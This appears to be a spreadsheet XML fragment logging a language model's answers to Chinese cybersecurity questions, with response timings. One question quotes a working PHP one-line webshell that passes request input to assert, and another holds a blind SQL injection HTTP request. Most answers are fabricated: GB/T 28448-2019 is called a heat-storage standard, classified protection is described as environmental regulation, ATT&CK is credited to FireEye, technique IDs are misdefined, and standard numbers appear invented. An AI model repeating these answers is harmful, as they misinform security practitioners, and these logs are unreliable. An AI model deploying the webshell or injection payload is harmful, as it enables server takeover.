在大多数情况下，您不应该使用WebShell来执行命令，因为它可能会对您的网站造成安全风险。如果您需要实现一个简单的命令行Shell，可以考虑使用一个简单的Java服务，例如`java.lang.ProcessBuilder`或`org.jline.terminal.Terminal`。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D75" t="n">
        <v>9.891859769821167</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="1" t="n">
        <v>74</v>
      </c>
      <c r="B76" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;?php
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?&gt;</t>
        </is>
      </c>
      <c r="C76" t="inlineStr">
        <is>
          <t>这是一个简单的Web Shell，它可以在浏览器中打开。如果您是一个恶意个人，您可以使用这个Web Shell来执行任何操作在您的服务器上。
我们可以通过分析代码来发现它可以perform以下操作：
1. 获取 $_REQUEST 参数：这是一个可读取的$_REQUEST 参数，包含了用户输入的值。
2. 使用 array_udiff_assoc() 函数：这个函数用于比较一个数组和另一个数组，并返回差异。在这个例子中，它用于比较 $_REQUEST 参数和一个固定的数组。
3. 使用 assert() 函数：这个函数用于检查一个值是否等于另一个值。如果您在URL中输入了一个不符合预期的值，这个函数就会执行一个异常处理程序。
总之，这个Web Shell可以用于执行任何操作在服务器上，只要您输入了一个合法的URL。如果您不想让您的服务器遭受攻击，请勿使用这个Web Shell。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D76" t="n">
        <v>9.789537668228149</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="1" t="n">
        <v>75</v>
      </c>
      <c r="B77" t="inlineStr">
        <is>
          <t>这是什么类型的网络攻击，如何防范？
GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(9999,99)) HTTP/1.1
Host: 192.168.77.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://192.168.77.137/general/index.php?isIE=0&amp;modify_pwd=0
Cookie: PHPSESSID=ebpjtm5tqh5tvida5keba73fr0; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d
DNT: 1
Connection: close</t>
        </is>
      </c>
      <c r="C77" t="inlineStr">
        <is>
          <t>这是一个 SQL 注入攻击，可以通过模拟用户 Input 的方式进行攻击。在这个攻击中，攻击者可以在用户 Input 中添加一个特定的操作符，例如 ' OR 1=1'，从而触发 SQL 语句的执行。
防范 SQL 注入攻击的方法有以下几点：
1. 使用 parameterized queries：使用 prepared statements 可以避免 direct SQL injection，因为 parameterized queries 将 Input  Parameter 进行编码，防止攻击者 inject 特定的操作符。
2. 使用 input validation：在接受用户 Input 时， Validate 用户 Input 的长度、 format 等，防止攻击者 Input 中添加不合法的操作符。
3. 使用 whitelist：限制只允许合法的操作符，防止攻击者 inject 不合法的操作符。
4. 使用 limit query scope：限制query scope 的扩展，防止攻击者 inject 敏感数据。
5. 使用 Encoding 防范：使用utf8 编码可以防止攻击者 inject 特定的操作符。
6. 使用 Firewall 防范：使用 Firewall 可以防止攻击者 direct attack 到 Database 。
7. 使用 Log 防范：记录用户 Input 的执行，可以检测到攻击。
总之，防范 SQL 注入攻击需要采取多个措施，包括使用 parameterized queries、input validation、whitelist、limit query scope、Encoding 防范、Firewall 防范和Log 防范等。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D77" t="n">
        <v>14.17463350296021</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="1" t="n">
        <v>76</v>
      </c>
      <c r="B78" t="inlineStr">
        <is>
          <t>什么是网络安全法</t>
        </is>
      </c>
      <c r="C78" t="inlineStr">
        <is>
          <t>律
网络安全法律是指适用于互联网和网络安全的法律、规则、约束和措施。这些法律、规则和措施的目的是保护互联网用户的隐私、安全和权益，并推动网络安全和稳定的发展。
网络安全法律的主要内容包括以下几个方面：
1. 个人隐私保护：禁止网络企业和个人收集、使用、处理个人隐私信息 без consent。
2. 网络安全措施：规定网络企业应该实施安全措施，如加密、检查、签名等，以防止网络攻击和数据泄露。
3. 网络违法行为禁止：禁止网络企业和用户进行违法的活动，如违反版权法、谋恶法、淫秽法等。
4. 网络信息管理：规定网络企业和用户应该管理和维护网络信息的准确、完整和可靠性。
5. 网络安全响应能力：规定网络企业应该具备可靠的网络安全响应能力，能够快速地采取措施应对网络安全问题。
6. 网络安全评估和评定：规定网络企业应该进行网络安全评估和评定，评估网络安全状况和风险，并对不符合要求进行纠正和惩罚。
7. 网络安全教育和适应：规定网络企业应该对用户进行网络安全教育和适应，教育用户如何安全地使用互联网和网络服务。
总之，网络安全法律的目的是保护互联网用户的隐私、安全和权益，并推动网络安全和稳定的发展。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D78" t="n">
        <v>19.79281497001648</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="1" t="n">
        <v>77</v>
      </c>
      <c r="B79" t="inlineStr">
        <is>
          <t>介绍一下网络安全法</t>
        </is>
      </c>
      <c r="C79" t="inlineStr">
        <is>
          <t>律与证明
INTRODUCTION
As the world becomes increasingly connected through the internet, the need for network security has grown exponentially. With the rise of cyber attacks, data breaches, and other security threats, it is essential to have a comprehensive understanding of network security laws and regulations. In this blog post, we will provide an overview of network security laws and regulations, as well as the importance of proof in these legal frameworks.
NETWORK SECURITY LAWS AND REGULATIONS
Network security laws and regulations are designed to protect the confidentiality, integrity, and availability of data stored or transmitted over networks. These laws and regulations cover a wide range of topics, including:
1. Data privacy: Laws that regulate the collection, use, and protection of personal data.
2. Data security: Laws that require organizations to implement appropriate security measures to protect data from unauthorized access, disclosure, or use.
3. Network infrastructure security: Laws that regulate the security of network infrastructure, including firewalls, routers, and switches.
4. Incident response: Laws that require organizations to have incident response plans in place to respond to security incidents.
5. Compliance and enforcement: Laws that establish the responsibilities of organizations and individuals for compliance with network security laws and regulations.
IMPORTANCE OF PROOF IN NETWORK SECURITY LAWS AND REGULATIONS
Proof is essential in network security laws and regulations to ensure that organizations can demonstrate compliance with legal requirements. Proof can take many forms, including:
1. Documentation: Organizations must maintain records of their security measures, including policies, procedures, and incident response plans.
2. Audits: Organizations must undergo regular security audits to demonstrate compliance with legal requirements.
3. Logging and monitoring: Organizations must implement logging and monitoring mechanisms to detect and respond to security incidents.
4. Incident response plans: Organizations must have incident response plans in place to respond to security incidents.
5. Training and awareness: Organizations must provide training and awareness programs for employees to educate them on network security laws and regulations.
BENEFITS OF NETWORK SECURITY LAWS AND REGULATIONS
Network security laws and regulations provide several benefits, including:
1. Protection of personal data: Network security laws and regulations help protect personal data from unauthorized access, disclosure, or use.
2. Protection of sensitive information: Network security laws and regulations help protect sensitive information, such as financial information, from unauthorized access or disclosure.
3. Increased trust: Network security laws and regulations help increase trust between organizations and their customers, partners, and stakeholders.
4. Reduced risk: Network security laws and regulations help reduce the risk of security incidents, which can result in financial losses, reputational damage, and legal liability.
5. Compliance with legal and regulatory requirements: Network security laws and regulations help organizations comply with legal and regulatory requirements, reducing the risk of legal penalties and fines.
CONCLUSION
Network security laws and regulations are essential for protecting the confidentiality, integrity, and availability of data stored or transmitted over networks. Proof is crucial in these legal frameworks to demonstrate compliance with legal requirements. By understanding network security laws and regulations and implementing appropriate security measures, organizations can reduce the risk of security incidents and increase trust between themselves and their stakeholders.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D79" t="n">
        <v>20.94087934494019</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="1" t="n">
        <v>78</v>
      </c>
      <c r="B80" t="inlineStr">
        <is>
          <t>介绍一下《GB/T 28448-2019》</t>
        </is>
      </c>
      <c r="C80" t="inlineStr">
        <is>
          <t>——热储能规范
GB/T 28448-2019《热储能规范》是中国标准化管理机构中国标准技术服务中心编辑的一篇标准文档，于2019年7月1日公布。本标准详细规定了热储能技术的设计、施工、监理和测试等过程，以保证热储能设备的安全、可靠和绿色。
本标规主要涵盖了以下几个方面：
1. 热储能技术基础理论：详细介绍热储能技术的基础理论，包括热能学、热传导、热辐射、热动力学、热保护等方面的基本原理和应用。
2. 热储能设备设计规范：详细规定热储能设备的设计要求，包括设备结构、材料选择、温度、压力、液体流速等参数的规定。
3. 热储能施工规范：详细规定热储能施工的要求和程序，包括施工地点、施工顺序、施工技术、施工人员资格等方面的规定。
4. 热储能监理规范：详细规定热储能监理的要求和程序，包括监理对象、监理领域、监理技术、监理人员资格等方面的规定。
5. 热储能测试规范：详细规定热储能测试的要求和程序，包括测试对象、测试顺序、测试技术、测试人员资格等方面的规定。
总的来说，GB/T 28448-2019《热储能规范》是中国热储能技术的一个重要参考文档，旨在保障热储能设备的安全、可靠和绿色，避免热储能设备的不良事件和环境潜在威胁。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D80" t="n">
        <v>21.64286828041077</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="1" t="n">
        <v>79</v>
      </c>
      <c r="B81" t="inlineStr">
        <is>
          <t>等保测评是什么</t>
        </is>
      </c>
      <c r="C81" t="inlineStr">
        <is>
          <t>？
Evaluation is a process of assessing the quality, value or effectiveness of something, such as a product, service, or program. In the context of education, evaluation is used to assess the quality of educational programs, courses, or materials. The goal of evaluation is to provide feedback on the strengths and weaknesses of an educational program, and to identify areas for improvement.
There are several types of evaluation methods used in education, including:
1. Formative evaluation: This type of evaluation is conducted during the development or implementation of a program, and is used to identify areas for improvement.
2. Summative evaluation: This type of evaluation is conducted after a program has been implemented, and is used to assess its overall effectiveness.
3. Process evaluation: This type of evaluation is focused on understanding how a program is implemented, and the factors that influence its success.
4. Impact evaluation: This type of evaluation is used to assess the impact of a program on student learning or other outcomes.
5. Self-evaluation: This type of evaluation is conducted by the program itself, and is used to assess its own effectiveness and identify areas for improvement.
6. Peer evaluation: This type of evaluation is conducted by external evaluators who are not directly involved in the program, and is used to assess the program's effectiveness and identify areas for improvement.
7. Student evaluation: This type of evaluation is conducted by students themselves, and is used to assess the effectiveness of a program from their perspective.
The advantages of evaluation in education include:
1. Improved program quality: Evaluation helps to identify areas for improvement, which can lead to higher quality programs.
2. Increased accountability: Evaluation helps to ensure that programs are accountable for their actions and outcomes.
3. Better decision-making: Evaluation provides valuable information that can be used to make informed decisions about program development and improvement.
4. Enhanced student learning: Evaluation can help to identify areas where student learning can be improved, leading to better outcomes.
5. Increased transparency and trust: Evaluation can help to increase transparency and trust in educational programs by providing information about their effectiveness.
6. Cost savings: Evaluation can help to identify areas where costs can be reduced, leading to cost savings.
7. Improved stakeholder engagement: Evaluation can help to increase stakeholder engagement by providing information about the effectiveness of programs and the impact they have on students.
In conclusion, evaluation is an essential component of educational programs, as it provides valuable information that can be used to improve program quality, accountability, decision-making, student learning, transparency, trust, and cost savings.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D81" t="n">
        <v>15.4594554901123</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="1" t="n">
        <v>80</v>
      </c>
      <c r="B82" t="inlineStr">
        <is>
          <t>什么是关机基础信息设施</t>
        </is>
      </c>
      <c r="C82" t="inlineStr">
        <is>
          <t>？
**关机基础信息设施**（Shutdown Basic Information Infrastructure，SBI）是一种基于中国标准的技术架构，用于实现各种设备和系统在关机时的基础信息保护和管理。
SBI 是由中国国家标准化管理委员会颁布的GB/T 30966-2017标准，定义了一个基础信息设施的架构和实现方式，以便在各种设备和系统关机时，可以保证数据的完整性、安全性和可用性。
SBI 主要包括以下几个部分：
1. 基础信息设施（BI）：指的是一个系统内的基础信息，包括设备、系统和应用程序等的基础信息。
2. 基础信息安全管理系统（BIS）：用于管理和保护 BI 的安全和隐私。
3. 基础信息恢复系统（BIR）：用于恢复 BI 和 BIS  после一些干扰或灾害。
4. 基础信息可用性监测系统（BIUT）：用于监测 BI 和 BIS 的可用性和性能。
SBI 技术架构的主要优点包括：
1. 一致性和完整性：SBI 可以保证各种设备和系统的基础信息的一致性和完整性，避免了数据的损失或漏洞。
2. 安全性：SBI 提供了强大的安全机制，以保护基础信息的安全和隐私。
3. 可用性：SBI 可以监测和恢复 BI 和 BIS 的可用性，以保证系统的稳定和可靠性。
总之，SBI 技术架构可以帮助企业和机构实现各种设备和系统的关机时基础信息保护和管理，提高系统的可靠性和可用性，并保护数据的安全和隐私。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D82" t="n">
        <v>18.61489391326904</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="1" t="n">
        <v>81</v>
      </c>
      <c r="B83" t="inlineStr">
        <is>
          <t>等级保护有哪些标准</t>
        </is>
      </c>
      <c r="C83" t="inlineStr">
        <is>
          <t>？
等级保护是指对不同的环境负荷进行不同的保护，以保护环境的健康。下面是一些常见的等级保护标准：
1. 普通保护：这是最基本的等级保护标准，用于保护环境免受轻度负荷。通常包括：
* 垃圾袋和污染物的规定处理和减少。
* 禁止排放有害物质，如污染物和废弃物。
* 保护湿地、林区和水体环境。
2. 优先保护：这是次等级保护标准，用于保护环境免受严重负荷。通常包括：
* 更严格的垃圾袋和污染物的规定处理和减少。
* 尽量避免或减少对环境具有严重影响的活动，如化学废残和核能活动。
* 保护特殊环境，如国家级自然保护区和生物圈。
3. 特殊保护：这是最高等级保护标准，用于保护环境免受特殊严重负荷。通常包括：
* 严格的垃圾袋和污染物的规定处理和减少。
* 尽量避免或减少对环境具有特殊影响的活动，如化学废残和核能活动。
* 保护特殊环境，如国家级自然保护区和生物圈。
4. 生态保护：这是一种特殊的等级保护标准，用于保护生物多样性和生态平衡。通常包括：
* 保护生态系统和生物多样性。
* 避免或减少对环境具有特殊影响的活动，如化学废残和核能活动。
* 尽量保护和恢复生态系统和生物多样性。
总之，等级保护标准是根据不同的环境负荷和影响程度，对不同的环境进行不同的保护。通过实施等级保护标准，可以减少环境污染和危害，保护环境的健康，并使人们更加关注环境保护的重要性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D83" t="n">
        <v>24.53101181983948</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="1" t="n">
        <v>82</v>
      </c>
      <c r="B84" t="inlineStr">
        <is>
          <t>等级保护测评有哪些国家标准</t>
        </is>
      </c>
      <c r="C84" t="inlineStr">
        <is>
          <t>等级保护测评是指对生产、销售和使用的货品、服务等进行评定和评价，以确定它们的安全性、适用性、可靠性和效率等等级，从而决定其使用的安全性、适用性和可靠性等等级。以下是一些国家标准的等级保护测评：
1. GB/T 3485-2008 化学药品等级保护测评
2. GB/T 3486-2008 医用器械等级保护测评
3. GB/T 3487-2008 食品等级保护测评
4. GB/T 3488-2008 纺织品等级保护测评
5. GB/T 3489-2008 建筑材料等级保护测评
6. GB/T 3490-2008 电子产品等级保护测评
7. GB/T 3491-2008 机械设备等级保护测评
8. GB/T 3492-2008 通信设备等级保护测评
9. GB/T 3493-2008 交通运输设备等级保护测评
10. GB/T 3494-2008 能源设备等级保护测评
以上是一些国家标准的等级保护测评，它们的主要内容包括评价对象、评价方法、评价标准和评价结果等。这些标准的适用 scopes 包括化学药品、医用器械、食品、纺织品、建筑材料、电子产品、机械设备、通信设备、交通运输设备和能源设备等等。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D84" t="n">
        <v>17.37746715545654</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="1" t="n">
        <v>83</v>
      </c>
      <c r="B85" t="inlineStr">
        <is>
          <t>有哪些网络安全领域的国家标准</t>
        </is>
      </c>
      <c r="C85" t="inlineStr">
        <is>
          <t>1. 在中国，有以下几个重要的国家标准：
	* GB/T 30248-2016 《信息安全管理评估标准》
	* GB/T 30249-2016 《信息安全管理框架标准》
	* GB/T 30250-2016 《信息安全管理实践指导标准》
	* GB/T 30251-2016 《网络安全管理评估标准》
	* GB/T 30252-2016 《网络安全管理框架标准》
	* GB/T 30253-2016 《网络安全管理实践指导标准》
2. 在美国，有以下几个重要的国家标准：
	* NIST SP 800-53 Rev. 4 《信息安全和privacy Protection 评估标准》
	* NIST SP 800-53a Rev. 2 《信息安全和privacy Protection 基准框架标准》
	* NIST SP 800-171 Rev. 3 《保护 Controlled Unclassified Information 的评估标准》
3. 在欧盟，有以下几个重要的国家标准：
	* ISO/IEC 27001:2013 《信息安全管理系统 — 评估标准》
	* ISO/IEC 27002:2013 《信息安全管理系统 — 安全实践指导》
	* ISO/IEC 27004:2012 《信息安全管理系统 — 评估和监测》
4. 在日本，有以下几个重要的国家标准：
	* JIS Q 150000:2016 《信息安全管理 — 评估标准》
	* JIS Q 15001:2016 《信息安全管理 — 基准框架标准》
	* JIS Q 15002:2016 《信息安全管理 — 实践指导标准》
这些国家标准都是指信息安全管理和网络安全管理的标准，包括评估标准、基准框架标准、实践指导标准等。它们都是国家级标准，具有法律级别的效力，用于指导和监督企业、机关、组织等信息安全管理和网络安全管理的实施。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D85" t="n">
        <v>22.06346082687378</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="1" t="n">
        <v>84</v>
      </c>
      <c r="B86" t="inlineStr">
        <is>
          <t>什么是ATT&amp;CK</t>
        </is>
      </c>
      <c r="C86" t="inlineStr">
        <is>
          <t>分类模型？
ATT&amp;CK分类模型是一种用于筛选恶意软件（malware）和其他恶意活动（adversarial behaviors）的分类模型。它是由FireEye的Security Operations（SOC）团队开发的，用于帮助SOC团队更好地识别和预测恶意活动。
ATT&amp;CK分类模型通过对恶意活动的分类，帮助SOC团队更好地理解和防御恶意攻击。它可以将恶意活动分为以下几类：
1. 规模级分类（Tactics）：分类恶意活动的执行方式和策略，例如跨境访问（Cross-Border）、诱导（Lure）、脚本访问（Scripting）等。
2. 攻击方式分类（Attack Types）：分类恶意活动的攻击方式，例如黑客（Blackhole）、Web攻击（Web）、邮件攻击（Email）等。
3. 攻击目标分类（Goals）：分类恶意活动的目标，例如系统访问（System）、数据泄露（Data）、资源泄露（Resource）等。
4. 恶意活动进程分类（Behavior）：分类恶意活动的进程，例如访问敏感数据（Access Sensitive Data）、隐ously accessing the network（Hiding Network Access）、执行恶意命令（Executing Malicious Commands）等。
通过使用ATT&amp;CK分类模型，SOC团队可以更好地理解恶意活动的复杂性和风险，并且可以使用这些分类来开发更加有效的防御策略。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D86" t="n">
        <v>14.96600222587585</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="1" t="n">
        <v>85</v>
      </c>
      <c r="B87" t="inlineStr">
        <is>
          <t>ATT&amp;CK分为哪些阶段</t>
        </is>
      </c>
      <c r="C87" t="inlineStr">
        <is>
          <t>？
ATT&amp;CK分为以下几个阶段：
1. Reconnaissance：扫描敏感数据和系统，了解敌对者的位置和资源。
2. Initial Access：通过攻击或欺骗获得 initial access 到缺陷的系统或敏感数据。
3. Establish Foothold：通过 exploiting 缺陷或 social engineering 将 initial access 扩展到更多的系统或数据。
4. Disclosure：通过泄露敏感数据或系统 información 到外部，实现攻击的目的。
5. Lateral Movement：通过 exploiting 缺陷或 social engineering 扩展攻击到更多的系统或数据。
6. Command and Control：通过 establishing 控制中心，将攻击者的系统或数据与攻击目标之间建立连接。
7. Exfiltration：通过泄露敏感数据或系统 información 到外部，实现攻击的目的。
8. Impact：通过攻击目标系统或数据，实现攻击的目的。
每个阶段都有不同的攻击方式和策略，并且攻击者可以在不同的阶段使用不同的攻击方式来实现目标。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D87" t="n">
        <v>10.52978801727295</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="1" t="n">
        <v>86</v>
      </c>
      <c r="B88" t="inlineStr">
        <is>
          <t>ATT&amp;CK中T1190指什么</t>
        </is>
      </c>
      <c r="C88" t="inlineStr">
        <is>
          <t>？  
T1190是ATT&amp;CK中的一个攻击方式，具体指的是什么？
T1190 stands for "Using a legitimate process to gain access to a system" in the MITRE ATT&amp;CK framework. This technique is used by attackers to gain unauthorized access to a system by leveraging a legitimate process or service that already has access to the system.
Here are some examples of how T1190 can be used in real-world attacks:
1. Phishing with a legitimate application: An attacker may use a legitimate application to send a phishing email that tricks the victim into installing a malicious payload. Once the payload is installed, the attacker can use the legitimate application to gain access to the system.
2. Malware using a legitimate service: An attacker may use a legitimate service, such as a remote access tool, to gain access to a system. Once the attacker has access to the system, they can use the legitimate service to spread malware or steal sensitive data.
3. Abusing a legitimate user account: An attacker may use a legitimate user account to gain access to a system. Once the attacker has access to the system, they can use the legitimate user account to escalate their privileges or perform malicious actions.
4. Using a legitimate exploit: An attacker may use a legitimate exploit to gain access to a system. Once the attacker has access to the system, they can use the exploit to escalate their privileges or perform malicious actions.
In summary, T1190 is a technique used by attackers to gain unauthorized access to a system by leveraging a legitimate process or service. It is a common technique used in social engineering attacks and can be used to bypass security controls.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D88" t="n">
        <v>10.72607922554016</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="1" t="n">
        <v>87</v>
      </c>
      <c r="B89" t="inlineStr">
        <is>
          <t>Data Destruction对应ATT&amp;CK中的哪个技术</t>
        </is>
      </c>
      <c r="C89" t="inlineStr">
        <is>
          <t>？
Data Destruction是一个非常重要的安全措施，可以防止敏感数据被意外地泄露或遭到恶意访问。ATT&amp;CK（Advanced Threat &amp; Advanced Cyber Attack）是一个涵盖了各种攻击方式的评估 Framework，其中包括 Data Destruction。以下是Data Destruction对应ATT&amp;CK中的哪个技术：
1. T1059: Data Destruction - This technique is used to destroy or manipulate data on a targeted system, making it unrecoverable or unreadable. It can be used to conceal the presence of malware or other attacker activities, or to prevent forensic analysis of the system.
2. T1083: Covert Channels - This technique involves creating a hidden communication channel between two systems, allowing attackers to exfiltrate data or inject malware without being detected. Data destruction can be used to create a covert channel by exploiting vulnerabilities in data storage or transmission.
3. T1155: Data Encryption - This technique involves encrypting data on a system, making it unreadable without the decryption key. Data destruction can be used to encrypt data on a system, making it difficult or impossible to recover.
4. T1057: Stealing Secrets - This technique involves stealing sensitive information, such as cryptographic keys or authentication credentials, from a system. Data destruction can be used to remove sensitive information from a system, making it difficult or impossible to recover.
5. T1087: Tampering - This technique involves modifying or manipulating a system's components, such as software or hardware, to gain unauthorized access or control. Data destruction can be used to tamper with a system's components, making it difficult or impossible to recover.
In summary, Data Destruction can be used in conjunction with various ATT&amp;CK techniques to carry out a cyber attack. It is important to be aware of these techniques and implement appropriate security measures to protect against them.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D89" t="n">
        <v>12.7664589881897</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="1" t="n">
        <v>88</v>
      </c>
      <c r="B90" t="inlineStr">
        <is>
          <t>有哪些APT组织使用了ATT&amp;CK中的T1072</t>
        </is>
      </c>
      <c r="C90" t="inlineStr">
        <is>
          <t>"Discovery and Discovery Feeds"?
ATT&amp;CK（Advanced Threat Hunter's Toolkit）是一个开源的跟踪和检测框架，用于帮助反恶意programmers和cybersecurity professionals detect and respond to advanced threats. T1072 "Discovery and Discovery Feeds" is a technique in the ATT&amp;CK framework that refers to the process of discovering and consuming threat intelligence feeds to inform incident response and threat hunting activities.
Here are some APT organizations that have used or are known to use ATT&amp;CK's T1072 "Discovery and Discovery Feeds":
1. Advanced Persistent Threat (APT) groups: These are sophisticated cybercrime groups that use customized malware and techniques to gain unauthorized access to sensitive data and systems. APT groups are known to use T1072 to gather and consume threat intelligence feeds to improve their operations and evade detection.
2. Nation-state actors: Nation-state actors, such as those linked to foreign governments, are also known to use T1072 to gather and consume threat intelligence feeds to inform their operations and evade detection. These actors may use a variety of techniques, including social engineering, phishing, and exploitation of vulnerabilities, to gain access to sensitive data and systems.
3. Cybercrime groups: Cybercrime groups, such as those involved in ransomware and other forms of malware, also use T1072 to gather and consume threat intelligence feeds. These groups may use a variety of techniques, including exploitation of vulnerabilities, social engineering, and phishing, to target victims and evade detection.
4. Hacktivist groups: Hacktivist groups, such as those involved in political activism or social justice movements, may also use T1072 to gather and consume threat intelligence feeds. These groups may use a variety of techniques, including exploitation of vulnerabilities, social engineering, and phishing, to target victims and evade detection.
5. Insider threats: Insider threats, such as rogue employees or contractors, may also use T1072 to gather and consume threat intelligence feeds. These threats may use a variety of techniques, including social engineering, phishing, and exploitation of vulnerabilities, to gain unauthorized access to sensitive data and systems.
It is important to note that T1072 is a technique that can be used by a wide range of actors, including both cybercriminals and nation-state actors. As such, it is essential for organizations to have a robust threat intelligence program in place to help identify and respond to potential threats.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D90" t="n">
        <v>16.18550682067871</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="1" t="n">
        <v>89</v>
      </c>
      <c r="B91" t="inlineStr">
        <is>
          <t>介绍一下网络安全领域中的STIX标准</t>
        </is>
      </c>
      <c r="C91" t="inlineStr">
        <is>
          <t>STIX（Structured Threat Information Expression）是一种用于描述网络安全风险和攻击的标准。STIX标准由OpenIOC（Open Indicator of Compromise）initiative于2014年开发出来，是一种基于XML的标准，用于在不同的网络安全平台之间传输和分享安全攻击信息。
STIX标准包含了一些基本的元素和架构，用于描述网络安全风险和攻击。这些元素包括：
1. Threat: 描述一个网络安全风险或攻击的基本封装。
2. Indicator: 描述一个特定的网络安全风险或攻击的特征。
3. Observables: 描述一个特定的网络安全风险或攻击的观察到的特征。
4. Actions: 描述一个特定的网络安全风险或攻击的操作。
5. Relationships: 描述两个或多个Threat对象之间的关系。
STIX标准的主要优点是：
1. 可扩展性：STIX标准可以扩展到不同的网络安全领域，包括 malware、phishing、黑客、网络犯罪等。
2. 标准化：STIX标准化了网络安全风险和攻击的描述，使得各种不同的平台可以互相交互和分享信息。
3. 可寻址性：STIX标准使用了一种简单易于理解的命名空间和分类系统，可以帮助分析人员快速找到相关的信息。
4. 可重用性：STIX标准的元素和架构可以被重用于不同的应用程序和场景，提高了开发效率和可维护性。
总之，STIX标准是一种非常有用的网络安全标准，可以帮助组织更好地捕捉和分析网络安全风险和攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D91" t="n">
        <v>19.24399638175964</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="1" t="n">
        <v>90</v>
      </c>
      <c r="B92" t="inlineStr">
        <is>
          <t>STIX标准中设计了哪些对象</t>
        </is>
      </c>
      <c r="C92" t="inlineStr">
        <is>
          <t>和它们的含义？
STIX（Structured Threat Information Expression）是一种用于描述和分享潜在威胁的标准，可以帮助组织在潜在威胁分析和响应中做出更加准确和有效的决策。STIX标准中设计了几种对象和它们的含义，以便在潜在威胁分析和响应中做出更加准确和有效的决策。下面是STIX标准中设计的一些对象和它们的含义：
1. Threat: 潜在威胁对象，包括人、设备、软件、网络和其他资产。
2. Indicator: 潜在威胁的识别和描述，例如恶意软件、恶意网站、黑客组织等。
3. Alert: 潜在威胁发生的警告，包括恶意软件扩展、网络攻击、数据泄露等。
4. Incident: 潜在威胁的响应和处理，包括识别和纠正潜在威胁，以及协助受到影响的团队和组织重新恢复。
5. Mitigation: 潜在威胁的降低和缓解措施，包括安全更新、筛选和防范恶意软件、增加安全措施等。
6. Response: 潜在威胁的响应和处理，包括识别和纠正潜在威胁，以及协助受到影响的团队和组织重新恢复。
7. Threat actor: 潜在威胁的攻击者，包括恶意软件、恶意网站、黑客组织等。
8. Threat intelligence: 潜在威胁的智能分析和识别，包括潜在威胁的识别和描述、潜在威胁的可能性和风险等。
STIX标准中设计了这些对象和它们的含义，以便在潜在威胁分析和响应中做出更加准确和有效的决策。这些对象可以用来描述和分析潜在威胁，并且可以帮助组织在潜在威胁分析和响应中做出更加准确和有效的决策。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D92" t="n">
        <v>24.05375123023987</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="1" t="n">
        <v>91</v>
      </c>
      <c r="B93" t="inlineStr">
        <is>
          <t>STIX标准中的对象通过什么关联起来</t>
        </is>
      </c>
      <c r="C93" t="inlineStr">
        <is>
          <t>？
STIX（Structured Threat Information Expression）是一种用于描述潜在威胁的标准，包括攻击者、攻击方式、攻击目标、攻击时间和其他相关信息。STIX standard defines a set of objects that represent various aspects of a potential threat, including:
1. Threat: Represents a potential threat, including the attacker, the attacked system, and the attack method.
2. Attacker: Represents the entity that is carrying out the attack, including its identity, location, and capabilities.
3. Attack: Represents the specific attack being carried out, including the attack method, the target system, and the time of the attack.
4. Target: Represents the system or resource that is being attacked, including its identity, location, and vulnerabilities.
5. Vulnerability: Represents a weakness in the target system that can be exploited by an attacker.
6. Exploit: Represents the specific technique or tool used to exploit a vulnerability.
7. Indicator: Represents a piece of information that can be used to identify a specific threat or attack, such as a malware sample or an IP address.
8. Incident: Represents a specific security event or situation, including the attacker, the target, and the outcome of the attack.
These objects are related through a set of relationships, such as:
1. Threat &gt; Attacker: The threat object is associated with the attacker object, indicating the entity carrying out the attack.
2. Threat &gt; Attack: The threat object is associated with the attack object, indicating the specific attack being carried out.
3. Attack &gt; Target: The attack object is associated with the target object, indicating the system or resource being attacked.
4. Attack &gt; Vulnerability: The attack object is associated with the vulnerability object, indicating the specific weakness being exploited.
5. Attack &gt; Exploit: The attack object is associated with the exploit object, indicating the specific technique or tool used to exploit the vulnerability.
6. Indicator &gt; Threat: The indicator object is associated with the threat object, indicating a specific piece of information that can be used to identify the threat.
7. Incident &gt; Threat: The incident object is associated with the threat object, indicating the specific security event or situation being described.
By defining these objects and their relationships, the STIX standard provides a structured framework for representing and sharing information about potential threats and security incidents. This can help organizations improve their threat intelligence and incident response capabilities, and better protect themselves against cyber threats.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D93" t="n">
        <v>15.91870999336243</v>
      </c>
    </row>
    <row r="94">
